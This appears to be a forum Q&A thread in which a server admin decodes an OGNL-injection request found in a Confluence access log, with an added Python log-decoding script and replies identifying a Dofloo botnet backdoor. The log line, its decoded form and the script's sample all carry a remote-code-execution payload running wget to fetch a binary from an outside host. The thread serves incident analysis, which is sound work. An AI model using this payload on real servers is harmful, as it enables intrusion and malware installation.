Can anyone tell me what this website is? It keeps attacking my server

2022-07-02 23:06:41 +08:00
 heyjei

Found the website ( http://101.43.177.155/) in Confluence's access log

[30/Jun/2022:00:00:03 +0800] - http-nio-6090-exec-400 101.43.177.155 GET //%24%7BClass.forName%28%22com%22%2B%22.opensymphony%22%2B%22.webwork%22%2B%22.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22CmdResponse%22%2CClass.forName%28%22javax%22%2B%22.script%22%2B%22.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C115%2C61%2C39%2C39%2C59%2C118%2C97%2C114%2C32%2C112%2C112%2C32%2C61%2C32%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C46%2C101%2C120%2C101%2C99%2C40%2C39%2C119%2C103%2C101%2C116%2C32%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C57%2C50%2C46%2C49%2C49%2C56%2C46%2C49%2C56%2C56%2C46%2C49%2C54%2C55%2C58%2C53%2C55%2C56%2C57%2C47%2C104%2C97%2C111%2C32%2C45%2C80%2C32%2C47%2C116%2C109%2C112%2C47%2C39%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C59%2C119%2C104%2C105%2C108%2C101%2C32%2C40%2C49%2C41%2C32%2C123%2C118%2C97%2C114%2C32%2C98%2C32%2C61%2C32%2C112%2C112%2C46%2C114%2C101%2C97%2C100%2C40%2C41%2C59%2C105%2C102%2C32%2C40%2C98%2C32%2C61%2C61%2C32%2C45%2C49%2C41%2C32%2C123%2C98%2C114%2C101%2C97%2C107%2C59%2C125%2C115%2C61%2C115%2C43%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C98%2C41%2C125%2C59%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C85%2C114%2C108%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C115%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/ HTTP/1.0 302 7042ms - - python-requests/2.28.0

After URL decoding it is [30/Jun/2022:00:00:03+0800]-http-nio-6090-exec-400101.43.177.155GET//${Class.forName("com"+".opensymphony"+".webwork"+".ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("CmdResponse",Class.forName("javax"+".script"+".ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode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}/HTTP/1.03027042ms--python-requests/2.28.0

After decoding the String.fromCharCode it is "var s='';var pp = java.lang.Runtime.getRuntime().exec('wget http://92.118.188.167:5789/hao -P /tmp/').getInputStream();while (1) {var b = pp.read();if (b == -1) {break;}s=s+String.fromCharCode(b)};java.util.Base64.getUrlEncoder().encodeToString(s.getBytes())"

That's as far as my analysis goes. Does anyone have any ideas? What is it doing?

1251 views
Node: Q&A
3 replies
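The decoding the original post did by hand, as an added Python example that is not code from the thread: it pulls the request path out of an access-log line, URL-decodes it, extracts the `${...}` OGNL expression, turns the `String.fromCharCode(...)` list back into text, and reports the script-engine / process-execution calls and download URLs it finds. The log line it builds for itself is constructed, with `attacker.invalid` as a placeholder host.

```python
import re
import urllib.parse

# What a defender looks for in a Confluence access log: an OGNL expression in the request path,
# a String.fromCharCode(...) list hiding the real script, and reflection/exec calls inside it.
PATH_RE = re.compile(r"\s(?:GET|POST|PUT|HEAD)\s(\S+)\s")
OGNL_RE = re.compile(r"\$\{(.+)\}")
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
INDICATORS = ("Class.forName", "ScriptEngineManager", "getEngineByName",
              "Runtime.getRuntime().exec", "ProcessBuilder")

def decode_charcodes(codes):
    """Turn '118,97,114' back into the text String.fromCharCode would produce."""
    return "".join(chr(int(n)) for n in codes.replace(" ", "").split(",") if n)

def analyse_access_log_line(line):
    """Decode one access-log line; every key is present even when the line is benign."""
    result = {"path": None, "ognl": None, "decoded_js": "", "urls": [], "indicators": []}
    m = PATH_RE.search(line)
    if not m:
        return result
    result["path"] = urllib.parse.unquote(m.group(1))
    o = OGNL_RE.search(result["path"])
    if not o:
        return result
    result["ognl"] = o.group(1)
    # The hidden script is the concatenation of every fromCharCode(...) list in the expression.
    result["decoded_js"] = "".join(decode_charcodes(c) for c in CHARCODE_RE.findall(result["ognl"]))
    text = result["ognl"] + result["decoded_js"]
    result["indicators"] = [i for i in INDICATORS if i in text]
    result["urls"] = URL_RE.findall(result["decoded_js"])
    return result

def build_sample_line(inner_js):
    """Constructed sample (not a real capture): wrap inner_js the same way the request in the post does."""
    codes = ",".join(str(ord(c)) for c in inner_js)
    ognl = ('${Class.forName("javax"+".script"+".ScriptEngineManager").newInstance()'
            '.getEngineByName("nashorn").eval("eval(String.fromCharCode(' + codes + '))")}')
    path = "//" + urllib.parse.quote(ognl, safe="") + "/"
    return ("[30/Jun/2022:00:00:03 +0800] - http-nio-6090-exec-400 203.0.113.10 GET "
            + path + " HTTP/1.0 302 7042ms - - python-requests/2.28.0")

if __name__ == "__main__":
    sample = build_sample_line(  # constructed inner script with a placeholder host
        "var pp = java.lang.Runtime.getRuntime().exec('wget http://attacker.invalid:5789/hao -P /tmp/');")
    for key, value in analyse_access_log_line(sample).items():
        print(key, "=>", value)
```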
Tukali
2022-07-03 11:05:45 +08:00
wget http://92.118.188.167:5789/hao
The sample that does the bad stuff is right there for you, isn't it? Download it and analyze what the file does.
heyjei
2022-07-03 11:34:37 +08:00
@Tukali It's a binary, I can't make sense of it. Sigh.
eviladan0s
2022-07-05 14:01:14 +08:00
A backdoor of the Dofloo botnet

https://www.v2ex.com/t/863693
